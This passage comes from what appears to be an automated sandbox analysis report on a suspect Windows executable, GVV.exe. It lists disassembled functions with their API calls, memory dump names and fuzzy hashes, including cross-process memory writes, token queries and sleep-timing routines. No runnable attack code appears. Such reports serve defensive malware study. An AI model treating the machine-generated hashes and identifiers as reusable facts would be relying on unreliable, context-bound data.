                • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0016FF41,80070057,?,?,?,0017035E), ref: 0017002B
                • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0016FF41,80070057,?,?), ref: 00170046
                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0016FF41,80070057,?,?), ref: 00170054
                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0016FF41,80070057,?), ref: 00170064
                • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0016FF41,80070057,?,?), ref: 00170070
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: From$Prog$FreeStringTasklstrcmpi
                • String ID:
                • API String ID: 3897988419-0
                • Opcode ID: b4f3160647a338efa1472cf8bd490e31800d6bdde4a93c429072061ec7a38ec9
                • Instruction ID: 2924653b4258aa47c63047502356423e73936db31b55e6f6b3a68ddde986e703
                • Opcode Fuzzy Hash: b4f3160647a338efa1472cf8bd490e31800d6bdde4a93c429072061ec7a38ec9
                • Instruction Fuzzy Hash: C3014F76600314FFDB124F69DC44BAA7AFDEF487A1F148128F909D6211D775DD809BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                Download Yara Rule
                APIs
                • QueryPerformanceCounter.KERNEL32(?), ref: 0017E997
                • QueryPerformanceFrequency.KERNEL32(?), ref: 0017E9A5
                • Sleep.KERNEL32(00000000), ref: 0017E9AD
                • QueryPerformanceCounter.KERNEL32(?), ref: 0017E9B7
                • Sleep.KERNEL32 ref: 0017E9F3
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: PerformanceQuery$CounterSleep$Frequency
                • String ID:
                • API String ID: 2833360925-0
                • Opcode ID: 7ee580e28a422a7b69e434ccb15f8b24772a17f7a816e542ccc8ffbf76933082
                • Instruction ID: 2ea664416bc370e938c7252799d5331969127aa392d632dddd6ffcd4cabb74f2
                • Opcode Fuzzy Hash: 7ee580e28a422a7b69e434ccb15f8b24772a17f7a816e542ccc8ffbf76933082
                • Instruction Fuzzy Hash: 36011B32D01529DBCF009FE5D859AEDBBB8BF0E705F014596E606B2241CB349595CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001710F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                Download Yara Rule
                APIs
                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00171114
                • GetLastError.KERNEL32(?,00000000,00000000,?,?,00170B9B,?,?,?), ref: 00171120
                • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00170B9B,?,?,?), ref: 0017112F
                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00170B9B,?,?,?), ref: 00171136
                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0017114D
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                • String ID:
                • API String ID: 842720411-0
                • Opcode ID: a45911750ef0f135f4bea5cbd65ba37fa7baaa09bd0e31f3f32736de8d8a0c36
                • Instruction ID: 67458dad71b86472dc9e403b870751fe7bb0e4a0fc32497cab2705768707c42c
                • Opcode Fuzzy Hash: a45911750ef0f135f4bea5cbd65ba37fa7baaa09bd0e31f3f32736de8d8a0c36
                • Instruction Fuzzy Hash: A7013C79200205BFDB114FA9DC49E6A3F7EEF8A3A0B644419FA45D7360DB31DD409EA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00170FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                Download Yara Rule
                APIs
                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00170FCA
                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00170FD6
                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00170FE5
                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00170FEC
                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00171002
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: HeapInformationToken$AllocErrorLastProcess
                • String ID:
                • API String ID: 44706859-0
                • Opcode ID: 4e00eaeff1feaaa32cd0f1f9022f79e91703435d563d58dec4346cbfe4d7f62a
                • Instruction ID: ff56d3d24cc5d95b74f6ed50dcaecd09145d5b2c6174722eb4e7b1038fa88a1a
                • Opcode Fuzzy Hash: 4e00eaeff1feaaa32cd0f1f9022f79e91703435d563d58dec4346cbfe4d7f62a
                • Instruction Fuzzy Hash: 06F04939200301FBDB214FA89C49F563BADEF8A762F204414FA49C6251DE70DC908AA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00171014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                Download Yara Rule
                APIs
                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0017102A
                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00171036
                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00171045
                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0017104C
                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00171062
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: HeapInformationToken$AllocErrorLastProcess
                • String ID:
                • API String ID: 44706859-0
                • Opcode ID: f3e6c16992c5ab67d0b81593a70e1cd7e8f5f99194c0c2c98fc18fe96649415c
                • Instruction ID: bc71f2625b8bb6b21b4a6ff9b4e387330444d30c5b32ca0b4bae0bfe60d7925d
                • Opcode Fuzzy Hash: f3e6c16992c5ab67d0b81593a70e1cd7e8f5f99194c0c2c98fc18fe96649415c
                • Instruction Fuzzy Hash: 30F06D39200301FBDB215FA8EC49F563BADFF8A761F204814FA49C7250DF70D8908AA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0018030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                Download Yara Rule
                APIs
                • CloseHandle.KERNEL32(?,?,?,?,0018017D,?,001832FC,?,00000001,00152592,?), ref: 00180324
                • CloseHandle.KERNEL32(?,?,?,?,0018017D,?,001832FC,?,00000001,00152592,?), ref: 00180331
                • CloseHandle.KERNEL32(?,?,?,?,0018017D,?,001832FC,?,00000001,00152592,?), ref: 0018033E
                • CloseHandle.KERNEL32(?,?,?,?,0018017D,?,001832FC,?,00000001,00152592,?), ref: 0018034B
                • CloseHandle.KERNEL32(?,?,?,?,0018017D,?,001832FC,?,00000001,00152592,?), ref: 00180358
                • CloseHandle.KERNEL32(?,?,?,?,0018017D,?,001832FC,?,00000001,00152592,?), ref: 00180365
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CloseHandle
                • String ID:
                • API String ID: 2962429428-0
                • Opcode ID: c0165e27ba4e602321bcb64dda1d7110376cc20afe78ed0ba153412cd2c24f72
                • Instruction ID: 8f2509d6045e8451a7850e31a8b81036201b77d9f3001ef74bda79bf5d677f3f
                • Opcode Fuzzy Hash: c0165e27ba4e602321bcb64dda1d7110376cc20afe78ed0ba153412cd2c24f72
                • Instruction Fuzzy Hash: 1C01AE72801B19DFCB31AF66D880812FBF9BF643153158A3FD19652931C7B1AA98DF80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0014D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 0014D752
                  • Part of subcall function 001429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000), ref: 001429DE
                  • Part of subcall function 001429C8: GetLastError.KERNEL32(00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000,00000000), ref: 001429F0
                • _free.LIBCMT ref: 0014D764
                • _free.LIBCMT ref: 0014D776
                • _free.LIBCMT ref: 0014D788
                • _free.LIBCMT ref: 0014D79A
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: bd190dc136e5ace80602a9015dc3d48ad4edb82adf9a98f0031d902f07f30b7c
                • Instruction ID: 4f2a5a596cecf4d918e432776660deb8249cbfe358d26ea9386a0b852e25869c
                • Opcode Fuzzy Hash: bd190dc136e5ace80602a9015dc3d48ad4edb82adf9a98f0031d902f07f30b7c
                • Instruction Fuzzy Hash: B0F09633542215AB8A25EB65F9C2C167BDDBB043197D40C06F048D7921C730FCC0C6A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00175C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                Download Yara Rule
                APIs
                • GetDlgItem.USER32(?,000003E9), ref: 00175C58
                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00175C6F
                • MessageBeep.USER32(00000000), ref: 00175C87
                • KillTimer.USER32(?,0000040A), ref: 00175CA3
                • EndDialog.USER32(?,00000001), ref: 00175CBD
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: BeepDialogItemKillMessageTextTimerWindow
                • String ID:
                • API String ID: 3741023627-0
                • Opcode ID: 5ded3eb9e3054265b1a8a59981d05a97c4beba3242a6190a5f1dd50e38df6c7c
                • Instruction ID: 3bd448da768c416eb9284012dc8f13e086afeb047bbf1d177cf2752553939452
                • Opcode Fuzzy Hash: 5ded3eb9e3054265b1a8a59981d05a97c4beba3242a6190a5f1dd50e38df6c7c
                • Instruction Fuzzy Hash: A901A430500B04ABEB259B10DD4EFA677BDBF11B05F044569B58BA15E1DBF0A9C4CBD0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001422A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 001422BE
                  • Part of subcall function 001429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000), ref: 001429DE
                  • Part of subcall function 001429C8: GetLastError.KERNEL32(00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000,00000000), ref: 001429F0
                • _free.LIBCMT ref: 001422D0
                • _free.LIBCMT ref: 001422E3
                • _free.LIBCMT ref: 001422F4
                • _free.LIBCMT ref: 00142305
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 24ffc6d5c0bf9248f3acafcb99116908732f1f171f8beb347187701e21913ece
                • Instruction ID: 602dac77da5ccc51ba6bb08709df9271aae7c11f97a282c9708936895d792918
                • Opcode Fuzzy Hash: 24ffc6d5c0bf9248f3acafcb99116908732f1f171f8beb347187701e21913ece
                • Instruction Fuzzy Hash: 1BF01D708021A2AB9A13AFD5EC8180C3B64F728B607900507F410DB671C77118D2AEE4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001295C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                Download Yara Rule
                APIs
                • EndPath.GDI32(?), ref: 001295D4
                • StrokeAndFillPath.GDI32(?,?,001671F7,00000000,?,?,?), ref: 001295F0
                • SelectObject.GDI32(?,00000000), ref: 00129603
                • DeleteObject.GDI32 ref: 00129616
                • StrokePath.GDI32(?), ref: 00129631
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Path$ObjectStroke$DeleteFillSelect
                • String ID:
                • API String ID: 2625713937-0
                • Opcode ID: f7814ae4c2bfac13059074e253c1e49cdf8b75947764e4a4f91da297df80e49c
                • Instruction ID: 882865ad8f90f97e2cdb7db75a85adc071538c29d39c6dbe05d634d8b1ef0503
                • Opcode Fuzzy Hash: f7814ae4c2bfac13059074e253c1e49cdf8b75947764e4a4f91da297df80e49c
                • Instruction Fuzzy Hash: F2F04F34005344FBDB165FA9ED5C7683FA1BB02326F048214F425598F2CB3489E5DF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00140F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: __freea$_free
                • String ID: a/p$am/pm
                • API String ID: 3432400110-3206640213
                • Opcode ID: a7a3582eed02333fb7d4fd95b6da0c68f5a70339006e8408c674361bb4bc1e5c
                • Instruction ID: aa8d0541b16c365589a806f8fbd611369897366b417dae10b0650a1f9d30020e
                • Opcode Fuzzy Hash: a7a3582eed02333fb7d4fd95b6da0c68f5a70339006e8408c674361bb4bc1e5c
                • Instruction Fuzzy Hash: 5DD12331A10206FACB289F68C895BFEBBB1FF05720F294119E915AB670D3759DC0CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00197B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00130242: EnterCriticalSection.KERNEL32(001E070C,001E1884,?,?,0012198B,001E2518,?,?,?,001112F9,00000000), ref: 0013024D
                  • Part of subcall function 00130242: LeaveCriticalSection.KERNEL32(001E070C,?,0012198B,001E2518,?,?,?,001112F9,00000000), ref: 0013028A
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                  • Part of subcall function 001300A3: __onexit.LIBCMT ref: 001300A9
                • __Init_thread_footer.LIBCMT ref: 00197BFB
                  • Part of subcall function 001301F8: EnterCriticalSection.KERNEL32(001E070C,?,?,00128747,001E2514), ref: 00130202
                  • Part of subcall function 001301F8: LeaveCriticalSection.KERNEL32(001E070C,?,00128747,001E2514), ref: 00130235
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                • String ID: 5$G$Variable must be of type 'Object'.
                • API String ID: 535116098-3733170431
                • Opcode ID: 85ae49eb5405b5e35364a285de2137bd20193557f59afb60ad51e7fdafcd0915
                • Instruction ID: e1a2a799c002adc555b0a5a928a499954b5dd06be4a955ecf2b8633810de4513
                • Opcode Fuzzy Hash: 85ae49eb5405b5e35364a285de2137bd20193557f59afb60ad51e7fdafcd0915
                • Instruction Fuzzy Hash: 02918A74A14209EFCF09EF94D9919ADB7F2FF59300F148059F806AB292DB71AE81CB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00172716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0017B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001721D0,?,?,00000034,00000800,?,00000034), ref: 0017B42D
                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00172760
                  • Part of subcall function 0017B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0017B3F8
                  • Part of subcall function 0017B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0017B355
                  • Part of subcall function 0017B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00172194,00000034,?,?,00001004,00000000,00000000), ref: 0017B365
                  • Part of subcall function 0017B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00172194,00000034,?,?,00001004,00000000,00000000), ref: 0017B37B
                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001727CD
                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0017281A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                • String ID: @
                • API String ID: 4150878124-2766056989
                • Opcode ID: bf464eb8b045a80cf1a54e60d22d922bb0838be579986a203943f5823fe1b09a
                • Instruction ID: ebf185b9fe54df90cc8f83c163beb255ad0330313fa4653ef5aac8cfd31679a3
                • Opcode Fuzzy Hash: bf464eb8b045a80cf1a54e60d22d922bb0838be579986a203943f5823fe1b09a
                • Instruction Fuzzy Hash: D6411D72900218AFDB10DBA4CD85BDEBBB8AF15700F108095FA59B7181DB716E85CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0014172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                Download Yara Rule
                APIs
                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\GVV.exe,00000104), ref: 00141769
                • _free.LIBCMT ref: 00141834
                • _free.LIBCMT ref: 0014183E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _free$FileModuleName
                • String ID: C:\Users\user\Desktop\GVV.exe
                • API String ID: 2506810119-1218256066
                • Opcode ID: 1ec7deb86a97f0d44c779427d8b6495c2c1bbfa17046cc1c3148b634e6d9f576
                • Instruction ID: afa4a80e3ed9f0630f3b9ac93f268f099262a9d38de1026897a6e4deb24229da
                • Opcode Fuzzy Hash: 1ec7deb86a97f0d44c779427d8b6495c2c1bbfa17046cc1c3148b634e6d9f576
                • Instruction Fuzzy Hash: B1318C71A40259FBDB21DB99DC81D9EBBFCEB99310B24416AF9049B221D7708AC0CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                Download Yara Rule
                APIs
                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0017C306
                • DeleteMenu.USER32(?,00000007,00000000), ref: 0017C34C
                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001E1990,00DE58C8), ref: 0017C395
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Menu$Delete$InfoItem
                • String ID: 0
                • API String ID: 135850232-4108050209
                • Opcode ID: a697141184a4ceaef9da81332e625d48a85447212fd81fee845bb527718370f4
                • Instruction ID: 652c4f973c6ab3a948b65daf3c5d0bfaf752bd3302faa94058d23c7da06e7187
                • Opcode Fuzzy Hash: a697141184a4ceaef9da81332e625d48a85447212fd81fee845bb527718370f4
                • Instruction Fuzzy Hash: 5B418E712083019FD724DF25D884B6ABBF4BF95320F14CA1DF9A9972D1D730A904CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                Download Yara Rule
                APIs
